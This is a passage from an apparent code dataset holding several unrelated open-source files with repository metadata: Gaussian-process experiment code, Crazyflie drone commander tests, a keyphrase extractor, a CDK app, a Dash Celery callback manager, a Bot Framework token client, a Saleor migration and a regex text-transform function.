mini_batch = sklearn.cluster.MiniBatchKMeans(num_inducing) cluster_indices = mini_batch.fit_predict(train_inputs) inducing_locations = mini_batch.cluster_centers_ return inducing_locations FLAGS = util.util.get_flags() BATCH_SIZE = FLAGS.batch_size LEARNING_RATE = FLAGS.learning_rate DISPLAY_STEP = FLAGS.display_step EPOCHS = FLAGS.n_epochs NUM_SAMPLES = FLAGS.mc_train PRED_SAMPLES = FLAGS.mc_test NUM_INDUCING = FLAGS.n_inducing NUM_COMPONENTS = FLAGS.num_components IS_ARD = FLAGS.is_ard TOL = FLAGS.opt_tol VAR_STEPS = FLAGS.var_steps DIAG_POST = False SPARSE_PRIOR = False SPARSE_POST = True # option for non-diag post MAXTIME = 1200 print("settings done") # define GPRN P and Q output_dim = 25 #P node_dim = 25 #Q lag_dim = 2 save_nlpds = False # If True saves samples of nlpds for n,p,s # extract dataset d, d_link = get_inputs() Ytr, Yte, Xtr, Xte = d['Ytr'], d['Yte'], d['Xtr'], d['Xte'] data = datasets.DataSet(Xtr.astype(np.float32), Ytr.astype(np.float32), shuffle=False) test = datasets.DataSet(Xte.astype(np.float32), Yte.astype(np.float32), shuffle=False) print("dataset created") # model config block rows (where P=Q): block all w.1, w.2 etc, leave f independent # order of block_struct is rows, node functions # lists required: block_struct, link_inputs, kern_link, kern #block_struct nested list of grouping order weight_struct = [[] for _ in range(output_dim)] for i in range(output_dim): row = list(range(i, i+output_dim*(node_dim-1)+1, output_dim)) row_0 = row.pop(i) # bring diag to pivot position weight_struct[i] = [row_0] + row nodes = [[x] for x in list(range(output_dim * node_dim, output_dim * node_dim + output_dim))] block_struct = weight_struct + nodes # create link inputs (link inputs used repeatedly but can have link input per group) # permute to bring diagonal to first position link_inputs = [[] for _ in range(output_dim)] for i in range(output_dim): idx = list(range(d_link.shape[0])) link_inputs[i] = d_link[[idx.pop(i)] + idx, :] link_inputs = link_inputs + [1.0 for i in range(output_dim)] # for full W row blocks, independent nodes # create 'between' kernel list klink_rows = [kernels.CompositeKernel('mul',[kernels.RadialBasis(2, std_dev=2.0, lengthscale=1.0, white=0.01, input_scaling = IS_ARD), kernels.CompactSlice(2, active_dims=[0,1], lengthscale = 2.0, input_scaling = IS_ARD)] ) for i in range(output_dim) ] klink_f = [1.0 for i in range(node_dim)] kernlink = klink_rows + klink_f # create 'within' kernel # kern lag_active_dims_s = [ [] for _ in range(output_dim)] for i in range(output_dim): lag_active_dims_s[i] = list(range(lag_dim*i, lag_dim*(i+1))) k_rows = [kernels.CompositeKernel('mul',[kernels.RadialBasisSlice(lag_dim, active_dims=lag_active_dims_s[i], std_dev = 1.0, white = 0.01, input_scaling = IS_ARD), kernels.PeriodicSliceFixed(1, active_dims=[Xtr.shape[1]-1], lengthscale=0.5, std_dev=1.0, period = 144) ]) for i in range(output_dim)] k_f = [kernels.RadialBasisSlice(lag_dim, active_dims=lag_active_dims_s[i], std_dev = 1.0, white = 0.01, input_scaling = IS_ARD) for i in range(output_dim)] kern = k_rows + k_f print('len link_inputs ',len(link_inputs)) print('len kernlink ',len(kernlink)) print('len kern ', len(kern)) print('no. groups = ', len(block_struct), 'no. 
latent functions =', len([i for b in block_struct for i in b])) print('number latent functions', node_dim*(output_dim+1)) likelihood = likelihoods.CovaryingRegressionNetwork(output_dim, node_dim, std_dev = 0.2) # p, q, lik_noise print("likelihood and kernels set") Z = init_z(data.X, NUM_INDUCING) print('inducing points set') m = mmgp.ExplicitSCMMGP(output_dim, likelihood, kern, kernlink, block_struct, Z, link_inputs, num_components=NUM_COMPONENTS, diag_post=DIAG_POST, sparse_prior=SPARSE_PRIOR, sparse_post=SPARSE_POST, num_samples=NUM_SAMPLES, predict_samples=PRED_SAMPLES) print("model set") # initialise losses and logging error_rate = losses.RootMeanSqError(data.Dout) os.chdir(outdir) with open("log_results.csv", 'w', newline='') as f: csv.writer(f).writerow(['epoch', 'fit_runtime', 'nelbo', error_rate.get_name(),'generalised_nlpd']) with open("log_params.csv", 'w', newline='') as f: csv.writer(f).writerow(['epoch', 'raw_kernel_params', 'raw_kernlink_params', 'raw_likelihood_params', 'raw_weights']) with open("log_comp_time.csv", 'w', newline='') as f: csv.writer(f).writerow(['epoch', 'batch_time', 'nelbo_time', 'pred_time', 'gen_nlpd_time', error_rate.get_name()+'_time']) # optimise o = tf.train.AdamOptimizer(LEARNING_RATE, beta1=0.9,beta2=0.99) print("start time = ", time.strftime('%X %x %Z')) m.fit(data, o, var_steps = VAR_STEPS, epochs = EPOCHS, batch_size = BATCH_SIZE, display_step=DISPLAY_STEP, test = test, loss = error_rate, tolerance = TOL, max_time=MAXTIME ) print("optimisation complete") # export final predicted values and loss metrics ypred = m.predict(test.X, batch_size = BATCH_SIZE) #same batchsize used for convenience np.savetxt("predictions.csv", np.concatenate(ypred, axis=1), delimiter=",") if save_nlpds == True: nlpd_samples, nlpd_meanvar = m.nlpd_samples(test.X, test.Y, batch_size = BATCH_SIZE) try: np.savetxt("nlpd_meanvar.csv", nlpd_meanvar, delimiter=",") # N x 2P as for predictions except: print('nlpd_meanvar export fail') try: np.savetxt("nlpd_samples.csv", nlpd_samples, delimiter=",") # NP x S (NxS concat for P tasks) except: print('nlpd_samples export fail') print("Final " + error_rate.get_name() + "=" + "%.4f" % error_rate.eval(test.Y, ypred[0])) print("Final " + "generalised_nlpd" + "=" + "%.4f" % m.nlpd_general(test.X, test.Y, batch_size = BATCH_SIZE)) error_rate_end = [losses.MeanAbsError(data.Dout)] # any extra accuracy measures at end of routine print("Final ", [e.get_name() for e in error_rate_end]) print([e.eval(test.Y, ypred[0]) for e in error_rate_end]) predvar = [np.mean(np.mean(ypred[1]))] print("Final predvar ", predvar) with open("final_losses.csv", 'w', newline='') as f: csv.writer(f).writerows([[e.get_name() for e in error_rate_end] + ['pred_var'], [e.eval(test.Y, ypred[0]) for e in error_rate_end] + predvar]) print("finish time = " + time.strftime('%X %x %Z'))
2.453125
2
cruiser-lib/test/positioning/test_position_hl_commander.py
cfreebuf/kubeedge-examples
0
1807
# -*- coding: utf-8 -*-
#
#     ||          ____  _ __
#  +------+      / __ )(_) /_______________ _____  ___
#  | 0xBC |     / __  / / __/ ___/ ___/ __ `/_  / / _ \
#  +------+    / /_/ / / /_/ /__/ /  / /_/ / / /_/  __/
#   ||  ||    /_____/_/\__/\___/_/   \__,_/ /___/\___/
#
#  Copyright (C) 2018 Bitcraze AB
#
#  This program is free software; you can redistribute it and/or
#  modify it under the terms of the GNU General Public License
#  as published by the Free Software Foundation; either version 2
#  of the License, or (at your option) any later version.
#
#  This program is distributed in the hope that it will be useful,
#  but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#  You should have received a copy of the GNU General Public License
#  along with this program; if not, write to the Free Software
#  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#  MA  02110-1301, USA.
import math
import sys
import unittest

from cflib.crazyflie import Crazyflie
from cflib.crazyflie import HighLevelCommander
from cflib.crazyflie import Param
from cflib.positioning.position_hl_commander import PositionHlCommander

if sys.version_info < (3, 3):
    from mock import MagicMock, patch, call
else:
    from unittest.mock import MagicMock, patch, call


@patch('time.sleep')
class TestPositionHlCommander(unittest.TestCase):
    def setUp(self):
        self.commander_mock = MagicMock(spec=HighLevelCommander)
        self.param_mock = MagicMock(spec=Param)
        self.cf_mock = MagicMock(spec=Crazyflie)
        self.cf_mock.high_level_commander = self.commander_mock
        self.cf_mock.param = self.param_mock
        self.cf_mock.is_connected.return_value = True

        self.sut = PositionHlCommander(self.cf_mock)

    def test_that_the_estimator_is_reset_on_take_off(self, sleep_mock):
        # Fixture
        sut = PositionHlCommander(self.cf_mock, 1.0, 2.0, 3.0)

        # Test
        sut.take_off()

        # Assert
        self.param_mock.set_value.assert_has_calls([
            call('kalman.initialX', '{:.2f}'.format(1.0)),
            call('kalman.initialY', '{:.2f}'.format(2.0)),
            call('kalman.initialZ', '{:.2f}'.format(3.0)),
            call('kalman.resetEstimation', '1'),
            call('kalman.resetEstimation', '0')
        ])

    def test_that_the_hi_level_commander_is_activated_on_take_off(self, sleep_mock):
        # Fixture

        # Test
        self.sut.take_off()

        # Assert
        self.param_mock.set_value.assert_has_calls([
            call('commander.enHighLevel', '1')
        ])

    def test_that_controller_is_selected_on_take_off(self, sleep_mock):
        # Fixture
        self.sut.set_controller(PositionHlCommander.CONTROLLER_MELLINGER)

        # Test
        self.sut.take_off()

        # Assert
        self.param_mock.set_value.assert_has_calls([
            call('stabilizer.controller', '2')
        ])

    def test_that_take_off_raises_exception_if_not_connected(self, sleep_mock):
        # Fixture
        self.cf_mock.is_connected.return_value = False

        # Test
        # Assert
        with self.assertRaises(Exception):
            self.sut.take_off()

    def test_that_take_off_raises_exception_when_already_flying(self, sleep_mock):
        # Fixture
        self.sut.take_off()

        # Test
        # Assert
        with self.assertRaises(Exception):
            self.sut.take_off()

    def test_that_it_goes_up_on_take_off(self, sleep_mock):
        # Fixture

        # Test
        self.sut.take_off(height=0.4, velocity=0.6)

        # Assert
        duration = 0.4 / 0.6
        self.commander_mock.takeoff.assert_called_with(0.4, duration)
        sleep_mock.assert_called_with(duration)

    def test_that_it_goes_up_to_default_height(self, sleep_mock):
        # Fixture
        sut = PositionHlCommander(self.cf_mock, default_height=0.4)

        # Test
        sut.take_off(velocity=0.6)

        # Assert
        duration = 0.4 / 0.6
        self.commander_mock.takeoff.assert_called_with(0.4, duration)
        sleep_mock.assert_called_with(duration)

    def test_that_it_goes_down_on_landing(self, sleep_mock):
        # Fixture
        self.sut.take_off(height=0.4)

        # Test
        self.sut.land(velocity=0.6)

        # Assert
        duration = 0.4 / 0.6
        self.commander_mock.land.assert_called_with(0.0, duration)
        sleep_mock.assert_called_with(duration)

    def test_that_it_takes_off_and_lands_as_context_manager(self, sleep_mock):
        # Fixture

        # Test
        with self.sut:
            pass

        # Assert
        duration1 = 0.5 / 0.5
        duration2 = 0.5 / 0.5
        self.commander_mock.takeoff.assert_called_with(0.5, duration1)
        self.commander_mock.land.assert_called_with(0.0, duration2)
        sleep_mock.assert_called_with(duration1)
        sleep_mock.assert_called_with(duration2)

    def test_that_it_returns_current_position(self, sleep_mock):
        # Fixture
        self.sut.take_off(height=0.4, velocity=0.6)

        # Test
        actual = self.sut.get_position()

        # Assert
        self.assertEqual(actual, (0.0, 0.0, 0.4))

    def test_that_it_goes_to_position(self, sleep_mock):
        # Fixture
        self.sut.take_off()
        inital_pos = self.sut.get_position()

        # Test
        self.sut.go_to(1.0, 2.0, 3.0, 4.0)

        # Assert
        distance = self._distance(inital_pos, (1.0, 2.0, 3.0))
        duration = distance / 4.0
        self.commander_mock.go_to.assert_called_with(
            1.0, 2.0, 3.0, 0.0, duration)
        sleep_mock.assert_called_with(duration)

    def test_that_it_moves_distance(self, sleep_mock):
        # Fixture
        self.sut.take_off()
        inital_pos = self.sut.get_position()

        # Test
        self.sut.move_distance(1.0, 2.0, 3.0, 4.0)

        # Assert
        distance = self._distance((0.0, 0.0, 0.0), (1.0, 2.0, 3.0))
        duration = distance / 4.0
        final_pos = (
            inital_pos[0] + 1.0,
            inital_pos[1] + 2.0,
            inital_pos[2] + 3.0)
        self.commander_mock.go_to.assert_called_with(
            final_pos[0], final_pos[1], final_pos[2], 0.0, duration)
        sleep_mock.assert_called_with(duration)

    def test_that_it_goes_forward(self, sleep_mock):
        # Fixture
        self.sut.take_off()
        inital_pos = self.sut.get_position()

        # Test
        self.sut.forward(1.0, 2.0)

        # Assert
        duration = 1.0 / 2.0
        final_pos = (
            inital_pos[0] + 1.0,
            inital_pos[1],
            inital_pos[2])
        self.commander_mock.go_to.assert_called_with(
            final_pos[0], final_pos[1], final_pos[2], 0.0, duration)
        sleep_mock.assert_called_with(duration)

    def test_that_it_goes_back(self, sleep_mock):
        # Fixture
        self.sut.take_off()
        inital_pos = self.sut.get_position()

        # Test
        self.sut.back(1.0, 2.0)

        # Assert
        duration = 1.0 / 2.0
        final_pos = (
            inital_pos[0] - 1.0,
            inital_pos[1],
            inital_pos[2])
        self.commander_mock.go_to.assert_called_with(
            final_pos[0], final_pos[1], final_pos[2], 0.0, duration)
        sleep_mock.assert_called_with(duration)

    def test_that_it_goes_left(self, sleep_mock):
        # Fixture
        self.sut.take_off()
        inital_pos = self.sut.get_position()

        # Test
        self.sut.left(1.0, 2.0)

        # Assert
        duration = 1.0 / 2.0
        final_pos = (
            inital_pos[0],
            inital_pos[1] + 1.0,
            inital_pos[2])
        self.commander_mock.go_to.assert_called_with(
            final_pos[0], final_pos[1], final_pos[2], 0.0, duration)
        sleep_mock.assert_called_with(duration)

    def test_that_it_goes_right(self, sleep_mock):
        # Fixture
        self.sut.take_off()
        inital_pos = self.sut.get_position()

        # Test
        self.sut.right(1.0, 2.0)

        # Assert
        duration = 1.0 / 2.0
        final_pos = (
            inital_pos[0],
            inital_pos[1] - 1,
            inital_pos[2])
        self.commander_mock.go_to.assert_called_with(
            final_pos[0], final_pos[1], final_pos[2], 0, duration)
        sleep_mock.assert_called_with(duration)

    def test_that_it_goes_up(self, sleep_mock):
        # Fixture
        self.sut.take_off()
        inital_pos = self.sut.get_position()

        # Test
        self.sut.up(1.0, 2.0)

        # Assert
        duration = 1.0 / 2.0
        final_pos = (
            inital_pos[0],
            inital_pos[1],
            inital_pos[2] + 1)
        self.commander_mock.go_to.assert_called_with(
            final_pos[0], final_pos[1], final_pos[2], 0, duration)
        sleep_mock.assert_called_with(duration)

    def test_that_it_goes_down(self, sleep_mock):
        # Fixture
        self.sut.take_off()
        inital_pos = self.sut.get_position()

        # Test
        self.sut.down(1.0, 2.0)

        # Assert
        duration = 1.0 / 2.0
        final_pos = (
            inital_pos[0],
            inital_pos[1],
            inital_pos[2] - 1)
        self.commander_mock.go_to.assert_called_with(
            final_pos[0], final_pos[1], final_pos[2], 0, duration)
        sleep_mock.assert_called_with(duration)

    def test_that_default_velocity_is_used(self, sleep_mock):
        # Fixture
        self.sut.take_off()
        inital_pos = self.sut.get_position()
        self.sut.set_default_velocity(7)

        # Test
        self.sut.go_to(1.0, 2.0, 3.0)

        # Assert
        distance = self._distance(inital_pos, (1.0, 2.0, 3.0))
        duration = distance / 7.0
        self.commander_mock.go_to.assert_called_with(
            1.0, 2.0, 3.0, 0.0, duration)
        sleep_mock.assert_called_with(duration)

    def test_that_default_height_is_used(self, sleep_mock):
        # Fixture
        self.sut.take_off()
        inital_pos = self.sut.get_position()
        self.sut.set_default_velocity(7.0)
        self.sut.set_default_height(5.0)

        # Test
        self.sut.go_to(1.0, 2.0)

        # Assert
        distance = self._distance(inital_pos, (1.0, 2.0, 5.0))
        duration = distance / 7.0
        self.commander_mock.go_to.assert_called_with(
            1.0, 2.0, 5.0, 0.0, duration)
        sleep_mock.assert_called_with(duration)

    ######################################################################

    def _distance(self, p1, p2):
        dx = p1[0] - p2[0]
        dy = p1[1] - p2[1]
        dz = p1[2] - p2[2]
        return math.sqrt(dx * dx + dy * dy + dz * dz)


if __name__ == '__main__':
    unittest.main()
1.984375
2
onmt/keyphrase/pke/unsupervised/graph_based/expandrank.py
NaomiatLibrary/OpenNMT-kpg-release
152
1808
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: <NAME>
# Date: 10-02-2018

"""ExpandRank keyphrase extraction model.

Graph-based ranking approach to keyphrase extraction described in:

* <NAME> and <NAME>.
  Single Document Keyphrase Extraction Using Neighborhood Knowledge.
  *In proceedings of AAAI*, pages 855-860, 2008.

"""

from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
from __future__ import absolute_import

from onmt.keyphrase.pke.unsupervised import SingleRank
from onmt.keyphrase.pke.base import LoadFile

import networkx as nx
import logging


class ExpandRank(SingleRank):
    """ExpandRank keyphrase extraction model.

    Parameterized example::

        import pke
        import string
        from nltk.corpus import stopwords

        # 1. create an ExpandRank extractor.
        extractor = pke.unsupervised.ExpandRank()

        # 2. load the content of the document.
        extractor.load_document(input='path/to/input.xml')

        # 3. select the the longest sequences of nouns and adjectives, that do
        #    not contain punctuation marks or stopwords as candidates.
        pos = {'NOUN', 'PROPN', 'ADJ'}
        stoplist = list(string.punctuation)
        stoplist += ['-lrb-', '-rrb-', '-lcb-', '-rcb-', '-lsb-', '-rsb-']
        stoplist += stopwords.words('english')
        extractor.candidate_selection(pos=pos, stoplist=stoplist)

        # 4. weight the candidates using the sum of their word's scores that are
        #    computed using random walk. In the graph, nodes are words (nouns
        #    and adjectives only) that are connected if they occur in a window
        #    of 10 words. A set of extra documents should be provided to expand
        #    the graph.
        expanded_documents = [('path/to/input1.xml', similarity1),
                              ('path/to/input2.xml', similarity2)]
        extractor.candidate_weighting(window=10,
                                      pos=pos,
                                      expanded_documents=expanded_documents,
                                      format='corenlp')

        # 5. get the 10-highest scored candidates as keyphrases
        keyphrases = extractor.get_n_best(n=10)
    """

    def __init__(self):
        """Redefining initializer for ExpandRank."""

        super(ExpandRank, self).__init__()

    def expand_word_graph(self, input_file, similarity, window=10, pos=None):
        """Expands the word graph using the given document.

        Args:
            input_file (str): path to the input file.
            similarity (float): similarity for weighting edges.
            window (int): the window within the sentence for connecting two
                words in the graph, defaults to 10.
            pos (set): the set of valid pos for words to be considered as
                nodes in the graph, defaults to ('NOUN', 'PROPN', 'ADJ').
        """

        # define default pos tags set
        if pos is None:
            pos = {'NOUN', 'PROPN', 'ADJ'}

        # initialize document loader
        doc = LoadFile()

        # read document
        doc.load_document(input=input_file,
                          language=self.language,
                          normalization=self.normalization)

        # flatten document and initialize nodes
        sequence = []

        for sentence in doc.sentences:
            for j, node in enumerate(sentence.stems):
                if node not in self.graph and sentence.pos[j] in pos:
                    self.graph.add_node(node)
                sequence.append((node, sentence.pos[j]))

        # loop through sequence to build the edges in the graph
        for j, node_1 in enumerate(sequence):
            for k in range(j + 1, min(j + window, len(sequence))):
                node_2 = sequence[k]
                if node_1[1] in pos and node_2[1] in pos \
                        and node_1[0] != node_2[0]:
                    if not self.graph.has_edge(node_1[0], node_2[0]):
                        self.graph.add_edge(node_1[0], node_2[0], weight=0)
                    self.graph[node_1[0]][node_2[0]]['weight'] += similarity

    def candidate_weighting(self, window=10, pos=None, expanded_documents=None, normalized=False):
        """Candidate ranking using random walk.

        Args:
            window (int): the window within the sentence for connecting two
                words in the graph, defaults to 10.
            pos (set): the set of valid pos for words to be considered as
                nodes in the graph, defaults to ('NOUN', 'PROPN', 'ADJ').
            expanded_documents (list): the set of documents to expand the
                graph, should be a list of tuples (input_path, similarity).
                Defaults to empty list, i.e. no expansion.
            normalized (False): normalize keyphrase score by their length,
                defaults to False.
        """

        # define default pos tags set
        if pos is None:
            pos = {'NOUN', 'PROPN', 'ADJ'}

        if expanded_documents is None:
            expanded_documents = []
            logging.warning('No neighbor documents provided for ExpandRank.')

        # build the word graph
        self.build_word_graph(window=window, pos=pos)

        # expand the word graph
        for input_file, similarity in expanded_documents:
            self.expand_word_graph(input_file=input_file,
                                   similarity=similarity,
                                   window=window,
                                   pos=pos)

        # compute the word scores using random walk
        w = nx.pagerank_scipy(self.graph, alpha=0.85, weight='weight')

        # loop through the candidates
        for k in self.candidates.keys():
            tokens = self.candidates[k].lexical_form
            self.weights[k] = sum([w[t] for t in tokens])
            if normalized:
                self.weights[k] /= len(tokens)
2.875
3
5-serverless-xray-stack/app.py
mmeidlinger/cdk-microservices-labs
14
1809
#!/usr/bin/env python3

from aws_cdk import core

from fagate_serverless.fagate_serverless_stack import FagateServerlessStack

app = core.App()
FagateServerlessStack(app, "serverless-xray-stack")

app.synth()
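For context, an app file like this is the CDK entry point; it is typically synthesized and deployed with the standard CDK CLI (generic commands, not specific to this repo): `cdk synth serverless-xray-stack` to emit the CloudFormation template, then `cdk deploy serverless-xray-stack` to provision it.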
1.242188
1
dash/long_callback/managers/celery_manager.py
nickmelnikov82/dash
17,143
1810
import json
import inspect
import hashlib

from _plotly_utils.utils import PlotlyJSONEncoder

from dash.long_callback.managers import BaseLongCallbackManager


class CeleryLongCallbackManager(BaseLongCallbackManager):
    def __init__(self, celery_app, cache_by=None, expire=None):
        """
        Long callback manager that runs callback logic on a celery task queue,
        and stores results using a celery result backend.

        :param celery_app:
            A celery.Celery application instance that must be configured with a
            result backend. See the celery documentation for information on
            configuration options.
        :param cache_by:
            A list of zero-argument functions.  When provided, caching is enabled and
            the return values of these functions are combined with the callback
            function's input arguments and source code to generate cache keys.
        :param expire:
            If provided, a cache entry will be removed when it has not been accessed
            for ``expire`` seconds.  If not provided, the lifetime of cache entries
            is determined by the default behavior of the celery result backend.
        """
        try:
            import celery  # pylint: disable=import-outside-toplevel,import-error
            from celery.backends.base import (  # pylint: disable=import-outside-toplevel,import-error
                DisabledBackend,
            )
        except ImportError as missing_imports:
            raise ImportError(
                """\
CeleryLongCallbackManager requires extra dependencies which can be installed doing

    $ pip install "dash[celery]"\n"""
            ) from missing_imports

        if not isinstance(celery_app, celery.Celery):
            raise ValueError("First argument must be a celery.Celery object")

        if isinstance(celery_app.backend, DisabledBackend):
            raise ValueError("Celery instance must be configured with a result backend")

        super().__init__(cache_by)
        self.handle = celery_app
        self.expire = expire

    def terminate_job(self, job):
        if job is None:
            return
        self.handle.control.terminate(job)

    def terminate_unhealthy_job(self, job):
        task = self.get_task(job)
        if task and task.status in ("FAILURE", "REVOKED"):
            return self.terminate_job(job)
        return False

    def job_running(self, job):
        future = self.get_task(job)
        return future and future.status in (
            "PENDING",
            "RECEIVED",
            "STARTED",
            "RETRY",
            "PROGRESS",
        )

    def make_job_fn(self, fn, progress, args_deps):
        return _make_job_fn(fn, self.handle, progress, args_deps)

    def get_task(self, job):
        if job:
            return self.handle.AsyncResult(job)
        return None

    def clear_cache_entry(self, key):
        self.handle.backend.delete(key)

    def call_job_fn(self, key, job_fn, args):
        task = job_fn.delay(key, self._make_progress_key(key), args)
        return task.task_id

    def get_progress(self, key):
        progress_key = self._make_progress_key(key)
        progress_data = self.handle.backend.get(progress_key)
        if progress_data:
            return json.loads(progress_data)
        return None

    def result_ready(self, key):
        return self.handle.backend.get(key) is not None

    def get_result(self, key, job):
        # Get result value
        result = self.handle.backend.get(key)
        if result is None:
            return None

        result = json.loads(result)

        # Clear result if not caching
        if self.cache_by is None:
            self.clear_cache_entry(key)
        else:
            if self.expire:
                # Set/update expiration time
                self.handle.backend.expire(key, self.expire)
        self.clear_cache_entry(self._make_progress_key(key))

        self.terminate_job(job)
        return result


def _make_job_fn(fn, celery_app, progress, args_deps):
    cache = celery_app.backend

    # Hash function source and module to create a unique (but stable) celery task name
    fn_source = inspect.getsource(fn)
    fn_str = fn_source
    fn_hash = hashlib.sha1(fn_str.encode("utf-8")).hexdigest()

    @celery_app.task(name=f"long_callback_{fn_hash}")
    def job_fn(result_key, progress_key, user_callback_args, fn=fn):
        def _set_progress(progress_value):
            cache.set(progress_key, json.dumps(progress_value, cls=PlotlyJSONEncoder))

        maybe_progress = [_set_progress] if progress else []

        if isinstance(args_deps, dict):
            user_callback_output = fn(*maybe_progress, **user_callback_args)
        elif isinstance(args_deps, (list, tuple)):
            user_callback_output = fn(*maybe_progress, *user_callback_args)
        else:
            user_callback_output = fn(*maybe_progress, user_callback_args)

        cache.set(result_key, json.dumps(user_callback_output, cls=PlotlyJSONEncoder))

    return job_fn
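A hedged wiring sketch showing how a manager like this is handed to a Dash app; this mirrors the documented dash[celery] pattern, and the Redis broker/backend URLs are assumptions:

# Illustrative setup; assumes Redis is running locally as both broker and result backend.
import celery
from dash import Dash
from dash.long_callback import CeleryLongCallbackManager

celery_app = celery.Celery(__name__,
                           broker="redis://localhost:6379/0",
                           backend="redis://localhost:6379/1")
manager = CeleryLongCallbackManager(celery_app, expire=60)  # drop results after 60s idle
app = Dash(__name__, long_callback_manager=manager)

A separate Celery worker process then executes the `long_callback_<hash>` tasks that `_make_job_fn` registers, while the Dash server polls the result backend for progress and output.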
2.265625
2
libraries/botframework-connector/botframework/connector/token_api/_token_api_client.py
victor-kironde/botbuilder-python
10
1811
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------

from msrest.service_client import SDKClient
from msrest import Serializer, Deserializer

from ._configuration import TokenApiClientConfiguration
from .operations import BotSignInOperations
from .operations import UserTokenOperations
from . import models


class TokenApiClient(SDKClient):
    """TokenApiClient

    :ivar config: Configuration for client.
    :vartype config: TokenApiClientConfiguration

    :ivar bot_sign_in: BotSignIn operations
    :vartype bot_sign_in: botframework.tokenapi.operations.BotSignInOperations
    :ivar user_token: UserToken operations
    :vartype user_token: botframework.tokenapi.operations.UserTokenOperations

    :param credentials: Subscription credentials which uniquely identify
     client subscription.
    :type credentials: None
    :param str base_url: Service URL
    """

    def __init__(self, credentials, base_url=None):
        self.config = TokenApiClientConfiguration(credentials, base_url)
        super(TokenApiClient, self).__init__(self.config.credentials, self.config)

        client_models = {
            k: v for k, v in models.__dict__.items() if isinstance(v, type)
        }
        self.api_version = "token"
        self._serialize = Serializer(client_models)
        self._deserialize = Deserializer(client_models)

        self.bot_sign_in = BotSignInOperations(
            self._client, self.config, self._serialize, self._deserialize
        )
        self.user_token = UserTokenOperations(
            self._client, self.config, self._serialize, self._deserialize
        )
1.695313
2
soppi/sample.py
shikshan/soppi
0
1812
# content of test_sample.py
def inc(x: int) -> int:
    return x + 1
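This is the opening fragment of pytest's canonical getting-started example; a minimal companion test for it (pytest auto-discovers test_*.py files and test_* functions) would be:

def test_inc():
    assert inc(3) == 4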
1.71875
2
saleor/order/migrations/0081_auto_20200406_0456.py
fairhopeweb/saleor
15,337
1813
# Generated by Django 3.0.4 on 2020-04-06 09:56

from django.db import migrations

from saleor.order import OrderStatus


def match_orders_with_users(apps, *_args, **_kwargs):
    Order = apps.get_model("order", "Order")
    User = apps.get_model("account", "User")

    orders_without_user = Order.objects.filter(
        user_email__isnull=False, user=None
    ).exclude(status=OrderStatus.DRAFT)

    for order in orders_without_user:
        try:
            new_user = User.objects.get(email=order.user_email)
        except User.DoesNotExist:
            continue
        order.user = new_user
        order.save(update_fields=["user"])


class Migration(migrations.Migration):

    dependencies = [
        ("order", "0080_invoice"),
    ]

    operations = [
        migrations.RunPython(match_orders_with_users),
    ]
2.140625
2
function/python/brightics/function/textanalytics/regex.py
jhpark428/studio
202
1814
""" Copyright 2019 Samsung SDS Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from brightics.common.utils import check_required_parameters from brightics.common.exception import BrighticsFunctionException from .data import regex_format_dict import re def regex(table, **params): check_required_parameters(_regex, params, ['table']) return _regex(table, **params) def _regex(table, input_cols, transformation_mode='extract', find_mode='all', pattern='', user_dict_pattern='', custom_pattern='', replacement_string='', user_dict=None): out_table = table.copy() pattern_dict = regex_format_dict.pattern_dict user_pattern_dict = {} if user_dict is not None: user_patterns = user_dict.values for user_pattern in user_patterns: user_pattern_name = user_pattern[0] user_pattern_content = user_pattern[1] user_pattern_dict[user_pattern_name] = user_pattern_dict.get(user_pattern_name, []) + [user_pattern_content] user_pattern_dict = {key: r'|'.join(value) for key, value in user_pattern_dict.items()} if pattern == '': raise BrighticsFunctionException.from_errors([{'0100': "Please choose a pattern."}]) if pattern == 'custom': raw_pattern = custom_pattern elif pattern == 'user_dictionary': raw_pattern = user_pattern_dict.get(user_dict_pattern) if raw_pattern is None: raise BrighticsFunctionException.from_errors( [{'0100': user_dict_pattern + " is not a valid pattern name in the user dictionary."}]) else: raw_pattern = pattern_dict.get(pattern) regex_pattern = re.compile(raw_pattern) def transformation(text): if transformation_mode == 'extract': if find_mode == 'first': result = regex_pattern.search(text) if result is None: return "" else: return result.group() else: # find_mode == 'all' return regex_pattern.findall(text) elif transformation_mode == 'replace': if find_mode == 'first': return regex_pattern.sub(replacement_string, text, 1) else: # find_mode == 'all' return regex_pattern.sub(replacement_string, text) elif transformation_mode == 'remove': if find_mode == 'first': return regex_pattern.sub("", text, 1) else: # find_mode == 'all' return regex_pattern.sub("", text) else: # transformation_mode == 'split' if find_mode == 'first': return regex_pattern.split(text, 1) else: # find_mode == 'all' return regex_pattern.split(text) for col in input_cols: result_col = table[col].apply(transformation) out_table['regex_' + col] = result_col return {'out_table': out_table}
2.15625
2
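A minimal usage sketch for the regex transform above; it uses pattern='custom' so nothing from regex_format_dict is assumed, and the DataFrame contents are invented:

import pandas as pd

# Assumes _regex is importable from the module above.
df = pd.DataFrame({'text': ['call 010-1234', 'no digits here']})
out = _regex(df, input_cols=['text'], transformation_mode='extract',
             find_mode='all', pattern='custom',
             custom_pattern=r'\d{3}-\d{4}')['out_table']
print(out['regex_text'].tolist())  # [['010-1234'], []]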
bin/temperature_functions.py
travc/outbreak-reporter
0
1815
